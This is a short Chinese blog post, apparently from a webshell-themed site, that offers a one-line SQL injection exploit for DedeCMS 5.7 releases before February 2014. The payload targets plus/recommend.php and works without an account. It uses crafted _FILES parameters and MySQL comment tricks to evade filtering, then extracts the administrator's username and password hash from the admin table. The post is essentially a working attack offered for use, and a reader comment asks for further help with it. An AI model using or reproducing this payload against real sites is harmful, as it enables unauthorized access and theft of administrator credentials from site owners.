DedeCMS 20140201 之前的5.7通杀

分类:安全 | 2015-01-28 | 撸过 259 次
1人扯谈

无需注册会员账号:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'
or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select
CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`
limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]
[type]=application/octet-stream&_FILES[type][size]=111

 

20150128044136

本站内容均为原创,转载请务必保留署名与链接!
DedeCMS 20140201 之前的5.7通杀:https://www.webshell.cc/4655.html
标签: ,

相关日志

  1. 弄了几个,没搞得。估计是版本问题。具体操作能做例子么?